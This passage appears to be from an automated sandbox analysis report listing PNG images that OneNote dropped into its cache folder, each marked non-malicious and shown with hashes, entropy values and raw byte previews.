                                                                                                                                                                                                                  SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000029.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13737
                                                                                                                                                                                                                  Entropy (8bit):7.916899917415529
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                                  MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                                  SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                                  SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                                  SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002A.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2332
                                                                                                                                                                                                                  Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                                  MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                                  SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                                  SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                                  SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002B.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11332
                                                                                                                                                                                                                  Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                                  MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                                  SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                                  SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                                  SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002C.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.943341403425058
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                                  MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                                  SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                                  SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                                  SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002D.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2599
                                                                                                                                                                                                                  Entropy (8bit):7.903700862190034
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                                  MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                                  SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                                  SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                                  SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002E.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1570
                                                                                                                                                                                                                  Entropy (8bit):7.780157858994452
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                                  MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                                  SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                                  SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                                  SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002F.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4490
                                                                                                                                                                                                                  Entropy (8bit):7.928016176674318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                                  MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                                  SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                                  SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                                  SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002G.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11449
                                                                                                                                                                                                                  Entropy (8bit):7.91552812501629
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                                  MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                                  SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                                  SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                                  SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002H.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):7374
                                                                                                                                                                                                                  Entropy (8bit):7.955141875077912
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                                  MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                                  SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                                  SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                                  SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002I.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):19235
                                                                                                                                                                                                                  Entropy (8bit):7.944867159042578
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                                  MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                                  SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                                  SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                                  SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002J.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2210
                                                                                                                                                                                                                  Entropy (8bit):7.86853667196985
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                                  MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                                  SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                                  SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                                  SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002K.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2232
                                                                                                                                                                                                                  Entropy (8bit):7.837610270261933
                                                                                                                                                                                                                  Encrypted:false
